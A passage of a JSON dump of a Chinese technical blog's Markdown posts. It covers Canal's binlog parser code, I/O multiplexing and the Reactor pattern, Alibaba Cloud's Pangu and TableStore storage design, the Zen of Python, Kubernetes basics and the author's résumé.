erosaConnection.dump(startPosition.getJournalName(),\n startPosition.getPosition(),\n multiStageCoprocessor);\n }\n }\n } else {\n if (isGTIDMode() && StringUtils.isNotEmpty(startPosition.getGtid())) {\n // 判断所属instance是否启用GTID模式,是的话调用ErosaConnection中GTID对应方法dump数据\n // 这里会不断的向master fetch binlog直到running为false\n erosaConnection.dump(MysqlGTIDSet.parse(startPosition.getGtid()), sinkHandler);\n } else {\n if (StringUtils.isEmpty(startPosition.getJournalName())\n && startPosition.getTimestamp() != null) {\n erosaConnection.dump(startPosition.getTimestamp(), sinkHandler);\n } else {\n erosaConnection.dump(startPosition.getJournalName(),\n startPosition.getPosition(),\n sinkHandler);\n }\n }\n }\n } catch (TableIdNotFoundException e) {\n exception = e;\n // 特殊处理TableIdNotFound异常,出现这样的异常,一种可能就是起始的position是一个事务当中,导致tablemap\n // Event时间没解析过\n needTransactionPosition.compareAndSet(false, true);\n logger.error(String.format(\"dump address %s has an error, retrying. caused by \",\n runningInfo.getAddress().toString()), e);\n } catch (Throwable e) {\n processDumpError(e);\n exception = e;\n if (!running) {\n if (!(e instanceof java.nio.channels.ClosedByInterruptException || e.getCause() instanceof java.nio.channels.ClosedByInterruptException)) {\n throw new CanalParseException(String.format(\"dump address %s has an error, retrying. \",\n runningInfo.getAddress().toString()), e);\n }\n } else {\n logger.error(String.format(\"dump address %s has an error, retrying. caused by \",\n runningInfo.getAddress().toString()), e);\n sendAlarm(destination, ExceptionUtils.getFullStackTrace(e));\n }\n if (parserExceptionHandler != null) {\n parserExceptionHandler.handle(e);\n }\n } finally {\n // 重新置为中断状态\n Thread.interrupted();\n // 关闭一下链接\n afterDump(erosaConnection);\n try {\n if (erosaConnection != null) {\n erosaConnection.disconnect();\n }\n } catch (IOException e1) {\n if (!running) {\n throw new CanalParseException(String.format(\"disconnect address %s has an error, retrying. \",\n runningInfo.getAddress().toString()),\n e1);\n } else {\n logger.error(\"disconnect address {} has an error, retrying., caused by \",\n runningInfo.getAddress().toString(),\n e1);\n }\n }\n }\n // 出异常了,退出sink消费,释放一下状态\n eventSink.interrupt();\n transactionBuffer.reset();// 重置一下缓冲队列,重新记录数据\n binlogParser.reset();// 重新置位\n if (multiStageCoprocessor != null && multiStageCoprocessor.isStart()) {\n // 处理 RejectedExecutionException\n try {\n multiStageCoprocessor.stop();\n } catch (Throwable t) {\n logger.debug(\"multi processor rejected:\", t);\n }\n }\n\n if (running) {\n // sleep一段时间再进行重试\n try {\n Thread.sleep(10000 + RandomUtils.nextInt(10000));\n } catch (InterruptedException e) {\n }\n }\n }\n MDC.remove(\"destination\");\n }\n });\n\n parseThread.setUncaughtExceptionHandler(handler);\n parseThread.setName(String.format(\"destination = %s , address = %s , EventParser\",\n destination,\n runningInfo == null ? null : runningInfo.getAddress()));\n parseThread.start();\n}\n```\n\n里面基本上都添加了注释,解析部分分两张情况,第一种是非并行模式下,使用sinkHandler解析并存储解析后的数据到缓冲队列中。第二种是并行情况下,使用Disruptor实现\n\n## 三、总结\n\n如上面设计图中所示,eventParser作为一个线程被启动,内部将自己伪装成mysql slave,与master通讯,fetch binlog,在通过binlog parser解析,最终sink到缓冲队列。并行模式下通过Disruptor实现并行解析的,下一部分重点看下Disruptor并行解析的实现。"
},
{
"alpha_fraction": 0.8389570713043213,
"alphanum_fraction": 0.8549079895019531,
"avg_line_length": 40.278480529785156,
"blob_id": "3f310fcf4df5782a17e483ea24f9d8f67dbbf893",
"content_id": "6b858b3e9a24d27a127e79f16d5eea91716b1594",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7842,
"license_type": "no_license",
"max_line_length": 221,
"num_lines": 79,
"path": "/source/_posts/concurrent-server.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 服务器并发模型实现\ndate: 2018-07-13 21:11:47\ncategories: IO\ntags: [IO,高并发,多路复用]\n---\n### 服务器并发需求\n对于像Nginx这样的网络服务器,每秒可能会接收到几或几十万的网络请求,并且还有数以十万的最近几秒没有收发任何报文的不活跃连接。服务器需要同时处理这些连接事件,并且需要维持高效率的使用CPU等资源。\n\n### 并发编程的两种实现模型\n1)线程模型(或进程模型)\n一个线程处理一个连接的全部生命周期。\n优点:模型足够简单,可以实现复杂的业务场景,线程个数可以远大于CPU个数\n缺点:\n- 1)线程个数不是无限增大的。\n- 2)调度策略比较低效\n> 线程的调度是由内核调度算法决定的,调度策略并不会考虑某个线程处理的IO情况,它统一由时间片来决定。这样可能调度起来的线程IO资源并没有准备好,又得继续睡眠。这样来回唤醒、睡眠线程,在线程总数特别多时,它的低效就被放大了。\n\n2)多路复用模型\n对于一个Network IO来说,通常涉及到两个系统对象,一个是调用这个IO的进程(或者线程),另一个是系统内核,在处理连接上的消息时,大概可以分两个阶段(**下面还会提到**):\n- **第一阶段:等待数据(消息)准备好【内核中执行】**\n- **第二阶段:将数据从内核拷贝到进程中(消息)处理【内核向用户进程拷贝】**\n\n高并发编程方法是将这两个阶段分开处理。这样要求套接字必须是非阻塞的。\n那么第一个阶段,“等待消息准备好”的实现方式有两种:\n- 1)线程主动查询\n- 2)让一个线程为所有连接等待(多路复用)\n多路复用就是处理等待消息准备好事件的,但可以处理多个连接。它本身也会“等待”,但由于一个线程处理多个连接或者所有的连接。这样当线程被唤醒时,一定会有连接准备好,所有它是有效率的。\n\n### 多路复用的实现方式\n1)select & poll\n2)epoll\n多路复用的核心是一个线程处理所有连接的“等待消息准备好”,这一点epoll和select都是这么实现的。\n当数以十万并发连接存在时,每秒可能只有几十或几百个活跃的连接,同时其余数十万连接在这一秒是非活跃的,当需要找出活跃的连接时,调用select返回所有的连接,从中找出几百个活跃连接,在高并发的服务器下,这种低效就会被放大。所以,在处理并发上万个连接时,select就力不从心了。\n\nepoll的实现添加了epoll_wait方法只返回活跃的连接,这样就没有上面select的问题,在高并发下依然很高效。\n\n多路复用是实现高并发服务器的一种有效方式,那么实现多路复用需要系统内核提供相应的支持,下面看下几种常用的IO模型。\n### 四种IO模型\n- 1)Blocking IO\n默认情况下,所有的Socket都是blocking的,当用户进程发起recvfrom系统调用时,内核就开始上面IO的第一个阶段:准备数据。对于网络io来说,通常一开始数据还没有到达,这时内核就要等待足够的数据到达,而用户进程会被阻塞。当内核等到的数据准备好了,就会执行IO的第二个阶段:拷贝数据到用户进程。然后内核返回结果,用户进程才重新运行起来。\n\n- 2)non-blocking IO\n通常需要应用程序设置Socket为non-blocking,当用户进程发起Read请求时,如果内核数据还没有准备好,会返回一个error。对用户进程来说,发起读请求后,不需要等待,马上就会得到一个结果。当结果是error时,就表示内核还没有准备好数据,于是需要用户进程再次发起Read请求。一旦内核中数据准备好了,用户进程再次发起Read请求时,内核就会将数据拷贝到用户进程,然后返回。\n\n这里用户进程是需要轮询内核数据是否准备好的。\n\n- 3)IO多路复用\nselect、poll、epoll都属于IO多路复用的实现。通常每个socket都设置为non-blocking。以select为例,当用户进程调用select后,用户进程会被block(是block在select系统调用上,不是block在socket IO上),同时,内核会监视所有select负责的socket,当任何一个socket上数据准备好了,select就会返回。这时用户进程再调用read操作,就会将数据从内核拷贝到用户进程。\n\n- 4)Asynchronous IO\nLinux内核暂时还没有提供支持。用户发起read操作后,立刻可以去做其他事。对内核来说,当接收到一个异步read操作后,首先会立刻返回,不会block用户进程。然后,内核会等待数据准备好,并将数据拷贝到用户进程,都完成后,内核会给用户进程发一个signal,通知用户进程read操作完成了。\n\n可见,在整个IO操作过程中,用户进程不需要去检查IO操作的状态,也不需要主动去内核空间拷贝准备好了的数据。也就是说将整个IO操作都交给内核,操作完成后内核通知用户进程。\n\n### 同步IO & 异步IO\nBlocking IO、non-blocking IO、IO多路复用属于同步IO,Asynchronous IO属于异步IO,其核心区别是IO操作的两个阶段是不是被阻塞了。\n\n同步IO中IO操作的第一个阶段:数据准备,可以阻塞也可以非阻塞,但第二个阶段:数据拷贝到用户进程,是肯定阻塞的。\n异步IO中IO操作的第一个阶段和第二个阶段都是非阻塞的。\n\n其实最主要的区别就是第二个阶段是否是非阻塞的。\n\n有了IO多路复用,有了epoll,我们已经可以使服务器并发几十万连接的同时,维持比较高的TPS。然而这只是一种模型,如何在工程上实现这种模型,Reactor就是解决这种软件工程问题的一种途径,它可以在软件工程层面,将事件驱动框架分离出具体业务,将不同类型请求之间用面向对象的思想分离。下面看看Reactor的几个关键参与者\n### Reactor模式的5个关键的参与者\n- 描述符(handle):有操作系统提供,用于识别事件。如Socket、文件描述符等\n\n- 同步事件分离器(demultiplexer):是一个函数,用来等待一个或多个事件发生。调用者会被阻塞,直到分离器分离的描述符集上有事件发生。常用的分离器有Linux的Select函数、poll、epoll、kqueue等。I/O框架库异步将各种I/O复用系统调用封装成统一的接口,称为事件多路分离器。调用者会被阻塞,直到分离器分离的描述符集上游事件发生。\n\n- 事件处理器接口(event handler):是由一个或多个模板函数组成的接口。这些模板函数描述了和应用程序相关的某个事件的操作。\n\n- 具体的事件处理器:实现了应用程序的某个服务。每个具体的事件处理器总和一个描述符相关。它使用描述符来识别事件,识别应用成所提供的服务。\n\n- Reactor管理器(Reactor):定义了一些接口,用于应用程序控制事件的调度,以及应用程序注册、删除事件处理器和相关的描述符。是事件处理器的调度核心。使用同步事件分离器来等待事件发生,一旦事件发生,Reactor先分离每个事件,然后调度事件处理器,最后调用相关的模板函数来处理这个事件。\n\n### 参考文献\n[高性能网络编程5--IO复用与并发编程](https://blog.csdn.net/russell_tao/article/details/17119729)\n[IO - 同步,异步,阻塞,非阻塞 (亡羊补牢篇)](https://blog.csdn.net/historyasamirror/article/details/5778378)\n[高性能网络编程6--reactor反应堆与定时器管理](https://blog.csdn.net/russell_tao/article/details/17452997)"
},
{
"alpha_fraction": 0.7965031862258911,
"alphanum_fraction": 0.8024930953979492,
"avg_line_length": 26.215858459472656,
"blob_id": "97eb492c0b4cccd40a2a67b021aa741a293440f3",
"content_id": "995dff06cb3193108079fc6637a373bb8a7f0b5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 13831,
"license_type": "no_license",
"max_line_length": 258,
"num_lines": 227,
"path": "/source/_posts/pangu.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 阿里云分布式存储系统的研究与分享\ndate: 2018-04-13 21:08:17\ncategories: 分布式\ntags: [分布式, 系统设计]\n---\n\n### 云计算介绍\n云计算是一种弹性的计算模式,以虚拟化为基础,以网络为中心,为用户提供安全、快速、便捷的数据存储和网络计算服务, 包括所需要的硬件、平台、软件及服务等资源,而提供资源的网络就被称为“云”。\n达到让用户像使用水、电、煤气等资源一样便捷、高效。\n服务类型:\n - IaaS(基础设施即服务)\n - PaaS(平台即服务)\n - SaaS(软件即服务)\n - FaaS(函数即服务)\n\n### 阿里云计算\n阿里云计算主要围绕下面几个方面提供服务\n - 虚拟化\n主要对应的阿里云产品是弹性计算,包括弹性计算服务ECS、弹性伸缩、容器服务、函数计算等等\n - 存储&数据库\n主要是分布式存储,包括块存储、文件存储、CDN、RDS、OceanBase等等\n - 网络\n包括负责均衡SLB、VPC、NAT网关、高速通道等等\n - 安全\n包括DDoS 基础防护、云防火墙、堡垒机等等\n - 大数据应用及分析\nMaxCompute、流计算、EMR、推荐引擎、机器学习、图像识别、自然语言处理等等\n - 中间件\n包括消息服务、日志服务、搜索服务、云服务总线CSB、应用配置管理等等\n - 管理与工具\n计费计量、云监控、资源编排、访问控制RAM等等\n\n### 飞天开发平台\n\n飞天---阿里云计算核心平台,支撑了阿里云弹性计算、中间件、网络、数据库、大数据存储、大数据计算等服务。\n从设计图上可以看出,他包括盘古、伏羲、神农等等几个核心子系统。\n我们今天主要介绍盘古分布式存储系统,和在他之上的产品(主要是表格存储)的设计和实现\n\n### 分布式存储\n** 定义:**\n使用大量普通 PC 服务器通过网络互联,对外作为一个整体提供存储服务。\n** 存储的数据类型分类:**\n - 分布式文件系统\n通常作为分布式表格、分布式数据库的底层存储;常见的AWS Dynamo,Google GFS等\n - 分布式key-value系统\n主要存储关系简单的半结构化数据,只提供基于主键的CRUD。是分布式表格的一种简化实现,一般用作缓存\n - 分布式表格系统\n阿里云的TableStore\n - 分布式数据库\n阿里云OceanBase、HBase等\n\n### 数据存储产品\n\n\n共享块存储支持将一个共享块存储挂载到多个ECS上,这个可以解决我们之前去重模块跟etl必须在一台机器上部署的问题。\n目前在阿里云上大概有三种方式解决:\n - 1.通过共享块存储\n - 2.通过NAS\n - 3.通过云存储网关,本质上是通过NFS协议使用OSS来实现\n\n### 弹性块存储EBS\n弹性块存储是阿里云为ECS云服务器提供的块设备,高性能、低时延,满足随机读写,可以像使用物理硬盘一样格式化、创建文件系统。可用于大部分通用业务场景下的数据存储。\n主要产品:各种云盘\n\n从设计图上可以看出EBS是在盘古的基础上开发了一个块存储网关。\n** 块存储网关主要功能:**\n - 一是负责磁盘虚拟化:将后端盘古存储空间映射为本地盘(我们在阿里云上使用的ECS,是通过虚拟化的方式使用宿主机的cpu、内存、存储等等,这个有兴趣的话可以研究下)\n - 二是存储协议转换:IO请求转发到盘古Client\n\n\n### 表格存储TableStore\n表格存储是构建在阿里云飞天分布式系统之上的 NoSQL 数据存储服务,提供海量结构化数据的存储和实时访问。\n表格存储以实例和表的形式组织数据,通过数据分片和负载均衡,达到规模的无缝扩展。\n表格存储向应用程序屏蔽底层硬件平台的故障和错误,能自动从各类错误中快速恢复,提供非常高的服务可用性。\n表格存储管理的数据全部存储在 SSD 中并具有多个备份,提供了快速的访问性能和极高的数据可靠性。\n\n** 表格存储核心竞争力 **\n - 大数据模型\n - 分布式 + LSM(Log Structured Merge Trees)存储引擎:水平扩展,海量存储,高吞吐写入能力\n - 动态负载均衡,热点快速迁移\n - 自动连续分裂\n - 读写性能不受并发及数据存储规模影响\n - 数据生命周期\n - 完善的数据通道\n - 离线全量通道(CDP):对接离线计算引擎,数据分层\n - 实时增量通道(DTS):对接实时计算或搜索引擎,增量同步\n - 存储与计算结合\n - 打通在线存储、离线计算和实时分析的数据闭环\n - 容灾\n - 同城双集群、两地三中心和单元化\n - 成本优化\n - 计算成本:按量付费,资源包\n - 存储成本:低存储成本容量型实例,分级存储,优化压缩\n\n### 表格存储系统架构\n\n首先是用户层,我们使用的SDK,系统将用户使用SDK的请求通过SLB分发到多个Proxy(其实是内部的Client)上,这里实现Proxy的高可用。\n然后Proxy与TableMaster和TableWorker交互,完成用户请求。\nTableMaster和TableWorker、盘古、伏羲后面会有介绍\n\n\n - Proxy:负责鉴权及Meta数据缓存,协议转换等\n - Master:\n负责表级的元数据管理,建表、删表;分片的调度;自动的分片、负载均衡(将不同分片调度到空闲的TableWorker来加载);容错等\n - Table Worker:\n主要负责分区数据加载,读写数据、行锁等。为了提高性能,内部也会维护一个缓存(这个后面会介绍)\n\n接着是存储子系统盘古和调度子系统伏羲:\n - 1.表格存储的数据实际是在盘古,由盘古来提供数据的可靠存储,后面有盘古的介绍,这里不展开。\n - 2.调度子系统伏羲 配合TableMaster做调度,伏羲知道集群中机器的负载情况,协助TableMaster做调度。\n\n从这个图可以看出表格存储&盘古的整体设计有点类似ceph的设计,TableMaster和盘古可独立扩展。\n\n### 表格存储高可用—Failover\n\n** Master Failover: **\n由于表格存储的元数据是存储在盘古上的,所以数据容量 原则上是没有限制的(扩展性问题)。也由于盘古提供的可靠共享存储,表格存储的Master可以做到无状态,这样就比较容易的实现高可用。\n\n从这个图上可以看出,Master进程Crash或者机器宕机是由伏羲负责拉起,然后收集分区加载信息,但这样可能会有一段时间的不可用(咨询了表格存储的技术支持,可能是在对外的资料中隐藏了一些技术细节,但他说的小集群3个Master,大集群5个Master,在加上使用的是盘古共享存储,猜测这里应该跟HDFS的NameNode一样,使用zookeeper选主实现Master高可用)。\n\n** Table Worker Failover: **\n由于元数据存储在盘古上,所以当Table Worker宕掉后,分区可以直接由新的Table Worker来加载\n\n### 表格存储高性能-自动连续分裂\n\n - 1.表格存储支持连续的自动分裂(也是一种负责均衡的实现)。\n由于表格存储使用第一个主键列分片,而且数据是按主键列排序的,所以在当分片过大或者过热时可以很容易的分片,再加上表格存储的数据分区是逻辑单位,实际的数据存储在盘古(共享存储的好处),所以在分裂时,不需要迁移数据,可以很快完成分裂。\n\n - 2.由于表格存储是基于LSM(Log Structured Merge Trees)的,在数据写入或者更新的时候,会先写入commitlog进行持久化,然后再写入内存中的MemTable,MemTable会定期的flush成一个新的数据文件,后台定期对不同的数据文件进行合并,合并为一个更大的数据文件,并清理垃圾数据等。\n\n - 3.表格存储一张表的每个分片都拥有独立的commitlog,每次修改的内容都会append写入commitlog。当节点故障时,内存中的MemTable还未flush成数据文件,此时发生failover,分片被另外的TableWorker加载,只需要重新replay一部分commitlog即可恢复MemTable,保证写入的数据不丢。\n\n\n\n### 分布式存储系统-盘古\n - 高可靠\n - 多副本强一致\n - 端到端的数据校验、静默错误的检查 \n - 高可用\n - 多租户隔离\n - 基于Paxos的多组Master\n - Federation支持水平扩展\n - 高性能\n - 混合存储:SSD作为SATA盘Cache\n - 内存零拷贝\n - 数据处理流水线化增大吞吐\n - 低成本\n - 集群间共享数据\n - EC(Erasure Coding)等\n\n### 盘古架构\n\n三个模块:Master、Client、Chunk Server\n了解HDFS实现的人应该很熟悉这个图,盘古同HDFS一样采用(主从)master/slave设计。一个存储集群是由一组Master和一定数目的Chunk Server组成,在数据读写时Client先请求Master获取到数据存储的元数据,之后的数据读写,Client就直接跟Chunk Server交互了。Chunk Server和Master保持心跳,向Master反馈数据状态以及接受Master的指令。大部分的分布式存储系统设计都差不多,其中OpenStack的Ceph区别较大,代表了分布式块存储设计的方向。\n\n为了好理解,这里引用的是盘古1.0的设计图,盘古2.0主要的变化主要是Master节点在高可用上变化。\n\n### 盘古Master\n对应HDFS的NameNode,负责元数据管理,最主要的就是维护两个映射关系:\n - 文件名到数据块;\n - 数据块到Chunk Server列表。\n\n其中文件名到数据块的信息保存在磁盘上(持久化);但Master不保存数据块到Chunk Server列表,这个是通过Chunk Server在启动时的上报数据块信息,更新Master上的映射表。\nMaster暴露了文件系统的名字空间,用户可以 以文件的形式在上面存储数据。\nMaster在分布式文件系统中需要解决的三个核心问题:\n - 容量以Federation方式水平扩展\n - 高效数据流量动态规划实现最大吞吐\n - 高可用:Paxos数据一致,防止单点\n\n### 盘古Chunk Server\n对应HDFS的DataNode,负责数据存储,一般是多台组成集群。\n存储过程中,一个文件被分成一个或多个数据块(至少一个),这些块存储在多个Chunk Server上,每块数据通过多副本来保证可靠性以及加快后期的读取速度。Chunk Server负责处理分布式文件系统客户端的实际的读写数据请求。在Master的统一调度下进行数据块的创建、删除和复制。\n - 三副本强一致\n三副本位于不同的故障域(rack),故障时自动多点数据复制\n - 端到端的数据校验,静默错误检查\n - 心跳\n与Master维护心跳,上报机器状态;接收Master指令;\n - 混合存储提高写入性能、EC降低存储成本\n\n### Master扩展性\n** 可扩展:** 不成为系统瓶颈,能随数据服务器数量的增多而线性扩展 \n - 元数据的容量不成为系统瓶颈 \n - 服务请求能力不成为系统瓶颈 \n\n** 常用的实现方式:**\n - Federation\n\n### 盘古Master扩展性-Federation\n\n\n跟HDFS一样,基于Federation实现Master水平扩展。\n\nFederation使用了多个独立的Namespace,namenode之间相互独立且不需要互相协调,各自分工,管理自己的区域。\n\n分布式的datanode被用作通用的数据块存储存储设备。每个datanode要向集群中所有的namenode注册,且周期性地向所有namenode发送心跳和块报告,并执行来自所有namenode的命令。\n\n一个block pool由属于同一个namespace的数据块组成,每个datanode可能会存储集群中所有block pool的数据块。每个block pool内部自治,也就是说各自管理各自的block,不会与其他block pool交流。一个namenode挂掉了,不会影响其他namenode。\n\n某个namenode上的namespace和它对应的block pool一起被称为namespace volume(命名空间卷)。它是管理的基本单位。当一个namenode/nodespace被删除后,其所有datanode上对应的block pool也会被删除。当集群升级时,每个namespace volume作为一个基本单元进行升级。\n\n### 高可用实现方式\n\n** 高可用 ** :不成为故障单点\n - 多个备份,故障时快速切换\n - 保证状态一致性\n\n** 常用的实现方式:**\n - 主从同步\n - 分布式协议\n\n### 高可用实现方式-主从模式\n\nHDFS的实现方式,\n - 1)分布式锁互斥实现选主(ZK)\n - 2)通过共享存储实现数据一致性,HDFS是使用NFS作为共享存储\n - 3)通过心跳检测故障\n\n### 盘古Master高可用实现方式-分布式协议\n\n - 1)使用Paxos一致性协商协议,保证高可用和快速切换\n - 2)不依赖外部共享存储和互斥锁服务,独立自包含\n\n其实,了解到盘古是基于Raft协议实现的类Paxos协议。现在很多公司的分布式存储都采用Raft协议实现一致性,感兴趣的可以研究下。\n\nMaster高性能,通过使用Raid卡(或者闪存),提高Meta的读写性能。\n由于raid卡是带cache,并且是有电池的,所以在掉电的情况下可以电池放电周期内不丢失数据,所以,master可以在写入raid卡后就返回客户端成功,后台离线将缓存中的数据刷入后端SATA硬盘中。"
},
{
"alpha_fraction": 0.6460738778114319,
"alphanum_fraction": 0.6599307060241699,
"avg_line_length": 13.081300735473633,
"blob_id": "19dfa45d73ff37c812691bf59747d8bb4e7f2a5a",
"content_id": "f84b79b53b3206a010c457255ccc2ea229f57050",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2244,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 123,
"path": "/source/_posts/the-zen-of-python.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "title: 'The Zen Of Python'\ndate: 2014-07-01 11:07:53\ncategories: Python #文章文类\ntags: [Zen,python] #文章标签,多于一项时用这种格式\n---\n\n## The Zen Of Python\n\n补充些Python方面的文化,文章翻译自[http://legacy.python.org/dev/peps/pep-0020/](http://legacy.python.org/dev/peps/pep-0020/ \"PEP 20 -- The Zen of Python\")\n\t\n### Beautiful is better than ugly.\n\n``` bash\n\t整洁胜于杂乱\n```\n\n### Explicit is better than implicit.\n\n``` bash\n\t明了胜于隐晦\n```\n\n### Simple is better than complex.\n\n``` bash\n\t简单胜于复杂\n```\n\n### Complex is better than complicated.\n\n``` bash\n\t复杂胜于混乱\n```\n\n### Flat is better than nested.\n\n``` bash\n\t递推胜于嵌套\n````\n\n### Sparse is better than dense.\n\n``` bash\n\t稀疏胜于稠密\n```\n\n### Readability counts.\n\n``` bash\n\t可读性是最重要的---易读\n```\n\n### Special cases aren't special enough to break the rules.\n\n``` bash\n\t特例不足以打破规则\n```\n\n### Although practicality beats purity.\n\n``` bash\n\t但是,实用性胜于纯粹套用\n```\n\n### Errors should never pass silently.\n\n``` bash\n\t错误不应该不报\n```\n\n### Unless explicitly silenced.\n\n``` bash\n\t除非另有明确的目的\n```\n\n### In the face of ambiguity, refuse the temptation to guess.\n\n``` bash\n\t不清楚的,不能去猜\n```\n\n### There should be one-- and preferably only one --obvious way to do it.\n\n``` bash\n\t总会有一种方式来解决问题,并且通常只有一种\n```\n\n### Although that way may not be obvious at first unless you're Dutch.\n\n``` bash\n\t然而,这种解决问题的方式在一开始不是那么的明了,除非你有先见之明\n```\n\n### Now is better than never.\n\n``` bash\n\t现在,有一种不明了的解决方案比从来没有好\n```\n\n### Although never is often better than *right* now.\n\n``` bash\n\t然而,仓促的解决不然没有\n```\n\n### If the implementation is hard to explain, it's a bad idea.\n\n``` bash\n\t如果方案不明确,就是个坏的想法\n```\n\n### If the implementation is easy to explain, it may be a good idea.\n\n``` bash\n\t相反,则是个好的主意\n```\n\n### Namespaces are one honking great idea -- let's do more of those!\n\n``` bash\n\t名字空间是个好的设计,我们应该好好的使用它\n```\n"
},
{
"alpha_fraction": 0.8298192620277405,
"alphanum_fraction": 0.8388554453849792,
"avg_line_length": 30.140625,
"blob_id": "ddd2b1b3813f21769f4958e32aad2ff235c788e6",
"content_id": "3af3f4061f2ef0e1fce04bfb12cc520303b73bf6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4078,
"license_type": "no_license",
"max_line_length": 208,
"num_lines": 64,
"path": "/source/_posts/k8s1.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Kubernetes入门\ndate: 2018-06-14 22:26:16\ncategories: Kubernetes\ntags: [Kubernetes,k8s]\n---\n\nKubernetes是一个完备的分布式系统支撑平台,具有完备的集群管理能力,包括多层次的安全防护和准入机制、多租户应用支撑能力,透明的服务注册和服务发现机制,内建智能负载均衡器,强大的故障发现和自我修复能力,服务滚动升级和在线扩容能力,可扩展的资源和自动调度机制,以及多粒度的资源配额管理能力。所以,Kubernetes是一个全新的基于容器技术的分布式架构解决方案,并且是一个一站式的完备的分布式系统开发和支撑平台。\n\n遵从Kubernetes的设计思想,传统系统架构中的和业务无关的底层代码和功能模块,都可以立刻从我们的视线中消失,我们不必再费心于负载均衡器的选型和部署实施问题,不必考虑引入或自研一个复杂的服务治理框架,不必头疼服务监控和故障处理模块的开发。总之,使用Kubernetes提供 的解决方案,我们节省不少于30%的开发成本。\n\n\n** Kubernetes中几个重要的概念:**\n\n#### Master:\n- kube-apiserver:所有资源的增删改查的唯一入口\n- kube-controller-manager:所有资源对象的自动化控制中心\n- kube-scheduler:资源调度(pod调度)\n- etcd server:存储进程\n- Node:\n- kubelet:负责Pod对应的容器的创建、启停等,与Master节点密切协作,实现集群管理\n- kube-proxy:实现Kubernetes service的通信与负载均衡\n- Docker Engine:负责本机容器创建和管理\n\n#### Pod:\n- Pause:跟容器\n- containers:多个用户业务相关的容器\n每个Pod一个ip称为Pod ip\n\n##### Pod的运行状态:\n- Pending:API Server已经创建Pod,但所需要的容器镜像还没有创建,或者正在下载\n- Running:Pod内所有容器都创建了,且至少一个容器处于运行状态、正在启动状态或者正在重启状态\n- Succeeded:Pod内所有容器都成功执行退出,且不会再重启\n- Failed:Pod内所有容器均已退出,但至少有一个容器退出为失败状态\n- Unknown:无法获取该Pod的状态\n##### Pod的重启策略(RestartPolicy)\n- Always:默认,当容器失效时,由kubelet自动重启该容器\n- OnFailure:当容器终止运行且退出码非0时,由kubelet自动重启该容器\n- Never:不重启\n##### Pod的健康检查\n- LivenessProbe探针:存活检测,如果LivenessProbe探针探测到容器不健康,则由kubelet将其杀掉,并根据重启策略做相应的处理。如果一个容器不包含LivenessProbe探针,那么kubelet认为容器的LivenessProbe探针一直返回‘success’\n- ReadinessProbe探针:判断容器是否启动启动完成(ready),可以接收请求。如果ReadinessProbe探测到失败,则Pod的状态将被修改。Endpoint Controller将从Service的Endpoint中删除包含该容器所在Pod的Endpoint。\n##### Pod的调度:\n- NodeSelector:根据label调度\n- NodeAffinity:亲和性调度,更灵活\n- DaemonSet的Pod调度:在每个Node只运行一个Pod\n- Job批处理调度\n\n#### RC:\n主要功能之一是自动部署一个容器应用的多个副本,并持续监控副本数量,在集群内始终维持指定副本数\n- 通过定义RC实现Pod的创建及副本数量的自动控制\n- RC里包括完整的Pod定义模板\n- RC通过Label Selector实现对Pod副本的自动控制\n- 通过改变RC中Pod的副本数量,实现Pod的弹性伸缩\n- 通过改变RC里Pod模板的镜像版本,实现Pod的滚动升级\n\n#### PV:\n- 可以理解为Kubernetes集群中某个网络存储中对应的一块存储\n- 只能是网络存储,不属于任何Node,但可以在每个Node上访问\n- 并不是定义在Pod上的,而是独立于Pod之外定义\n- PV目前只有几种类型:GCE Persistent Disks、NFS、RBD、iSCSCI、AWS EBS、GFS等\n\n#### Service:\n主要目的是在Pod对外服务的前端加一层负载均衡,因为Pod的ip地址可能是会改变。"
},
{
"alpha_fraction": 0.49788135290145874,
"alphanum_fraction": 0.633474588394165,
"avg_line_length": 11.756756782531738,
"blob_id": "d9fe2b9e01cb374767e8041d47d853b97e2e2e0a",
"content_id": "2924308fb41d03a960bfad02eb4b6fd2bc579f81",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 768,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 37,
"path": "/source/resume/index.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 潜心积累、野蛮成长\ndate: 2018-06-09 21:34:24\ncomments: false\n---\n\n### 关于我\n\n八零后程序员,北漂10来年,于2019年初来到深圳。\n\n> Email: [email protected]\n> 博客:https://blog.7street.top\n> GitHub:https://github.com/polarisary\n\n### 工作经历\n> 2015.12 ~ 2019.3 智线科技 \n> 2012.2 ~ 2015.12 京东商城\n\n### 技术经历\n> 做过推荐系统\n> 在云平台待过\n> 熟悉爬虫相关\n> 了解一点K8S、Docker\n> 努力学习架构中\n\n### 编程语言\n- Java\n- Python\n- PHP\n\n### 教育经历\n> 中国地质大学(北京) - 信息工程学院 - 计算机应用【2009.9 ~ 2012.7】\n> 河南理工大学 - 计算机学院 - 计算机科学与技术【2005.9 ~ 2009.7】 \n\n### 其他 \n喜欢打篮球、羽毛球\n爱跑步\n"
},
{
"alpha_fraction": 0.5846154093742371,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 12.100000381469727,
"blob_id": "bd0e7fba6fbc01167c45fdd0cffdaba561a9465e",
"content_id": "c02098e52169606e734d29deb8d852e4ca57de03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 10,
"path": "/source/_posts/mysql-lock.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: mysql_lock\ndate: 2018-01-06 21:35:41\ncategories: MySQL\ntags: MySQL\n---\n\n### 以下是这周学习MySql锁相关知识的脑图:\n\n"
},
{
"alpha_fraction": 0.7421320080757141,
"alphanum_fraction": 0.7614213228225708,
"avg_line_length": 31.866666793823242,
